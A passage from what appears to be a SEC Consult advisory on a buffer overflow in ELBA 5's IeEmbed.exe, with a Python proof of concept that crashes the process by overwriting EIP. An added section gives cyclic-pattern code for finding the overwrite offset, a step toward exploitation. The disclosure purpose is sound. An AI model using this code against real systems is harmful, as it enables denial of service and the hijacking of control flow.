0,6,http://localhost0,6,foo=bar0,6,AAAAAAAAAAAA...{A x 4096}...AAAAAAAA
A harmless proof of concept (Python 3) is provided below. It executes no
code on the target; running it against the listening component crashes
IeEmbed.exe, and the crash can then be examined in a debugger attached to
that process.

import socket
import sys

# Value that lands in EIP after the overflow. 0xaaaaaaaa is chosen only to
# make the overwrite obvious in the debugger; it is not a usable address.
EIP = b'\xaa\xaa\xaa\xaa'


def socket_read(sock):
    """Read until the peer is silent for one second or closes the connection."""
    data = b''
    sock.settimeout(1)
    while True:
        try:
            buff = sock.recv(1024)
        except socket.timeout:
            break
        data += buff
        if not buff:
            break
    return data


if __name__ == '__main__':
    if len(sys.argv) != 3:
        print("Usage: %s <host> <port>" % sys.argv[0])
        sys.exit(1)
    host, port = sys.argv[1:]

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))

    print('\n- Searching for the window handle\n')
    for i in range(65552, 70000):
        # Command 1 with a guessed window handle; the PoC treats any reply
        # as the sign that the handle was accepted.
        pkt = ('0,1,%d\n' % i).encode()
        print('Sending data (to %s:%d):\n%s' % (host, int(port), repr(pkt)))
        s.send(pkt)
        data = socket_read(s)
        if data:
            print('\n- Sending exploit payload\n')
            # Three command-6 messages; the last field carries 2087 filler
            # bytes followed by the four bytes that overwrite EIP.
            pkt = (b'0,6,http://localhost0,6,foo=bar0,6,'
                   + b'A' * 2087 + EIP + b'\n')
            print('Sending data (to %s:%d):\n%s' % (host, int(port), repr(pkt)))
            s.send(pkt)
            s.close()
            sys.exit(0)

    print('No responding window handle found')
    sys.exit(1)
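The 2087 filler bytes the PoC places before EIP are the kind of figure one recovers from the crash the text says to examine in a debugger. The following is an added example written for this page; it is not part of the SEC Consult advisory or its PoC. It replaces the 'A' filler with a cyclic pattern, keeps the PoC's three-message "0,6," framing, and maps the EIP value the debugger reports back to the filler offset. The alphanumeric-only alphabet (no ',' or newline, which the PoC's packets use as separators) and the little-endian x86 register layout are assumptions made here, not facts stated by the vendor.

```python
import struct

# Alphanumerics only: the PoC frames messages on ',' and '\n', so the pattern
# must contain neither (assumption drawn from the PoC's packet format).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"


def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence B(k, n) (FKM algorithm): every
    n-symbol window occurs exactly once, so a window read back from a
    register identifies its position in the pattern."""
    k = len(alphabet)
    a = [0] * (n + 1)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_pattern(length, n=4):
    """First `length` bytes of the sequence; n-byte windows stay unique
    because they are a prefix of one de Bruijn cycle."""
    out = []
    for ch in de_bruijn(ALPHABET, n):
        if len(out) == length:
            break
        out.append(ch)
    return "".join(out).encode("ascii")


def windows_unique(pattern, n=4):
    """Sanity check before sending: no n-byte window repeats in the pattern."""
    windows = [pattern[i:i + n] for i in range(len(pattern) - n + 1)]
    return len(set(windows)) == len(windows)


def eip_offset(pattern, crashed_eip):
    """Given the EIP value shown by the debugger (x86, little-endian), return
    the filler offset whose bytes overwrote it, or -1 if EIP is not from
    the pattern (e.g. a different crash than the one being measured)."""
    return pattern.find(struct.pack("<I", crashed_eip & 0xFFFFFFFF))


def build_overflow_packet(filler, eip=b"\xaa\xaa\xaa\xaa"):
    """Same framing as the PoC: three command-6 messages, the third carrying
    the overflowing field followed by the bytes that land in EIP."""
    return b"0,6,http://localhost0,6,foo=bar0,6," + filler + eip + b"\n"


def poc_packet():
    """The PoC's crash packet: 2087 filler bytes, then 0xaaaaaaaa."""
    return build_overflow_packet(b"A" * 2087)


if __name__ == "__main__":
    # Step 1: send a pattern instead of 'A' * 4096 and note EIP at the crash.
    pat = cyclic_pattern(4096)
    assert windows_unique(pat)
    probe = build_overflow_packet(pat, eip=b"")
    # Step 2 (simulated here, no target needed): pretend the debugger showed
    # the four pattern bytes that sit at filler offset 2087, the PoC's value.
    reported_eip = int.from_bytes(pat[2087:2091], "little")
    print("EIP 0x%08x -> filler offset %d"
          % (reported_eip, eip_offset(pat, reported_eip)))
    print("probe packet %d bytes, PoC packet %d bytes"
          % (len(probe), len(poc_packet())))
```

The probe packet is meant to replace the payload the PoC sends after the window handle is found; once the debugger shows EIP, `eip_offset` gives the filler length to put in front of the address, which is how a value such as 2087 is obtained.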
Vulnerable / tested versions:
-----------------------------
5.5.0 R00006 build 0796
Vendor contact timeline:
------------------------
2012-09-04: Contacting vendor through software at racon-linz dot at
2012-09-04: Vendor response: Issues will be investigated.
2012-09-25: Vendor response: New release with fixes will be published on 03.12.2012
2012-11-26: Vendor response: Release rescheduled to 17.12.2012
2012-12-20: Public disclosure of advisory
Solution:
---------
Upgrade to ELBA 5 5.6.0 R3
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
EOF K. Gudinavicius / @2012
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.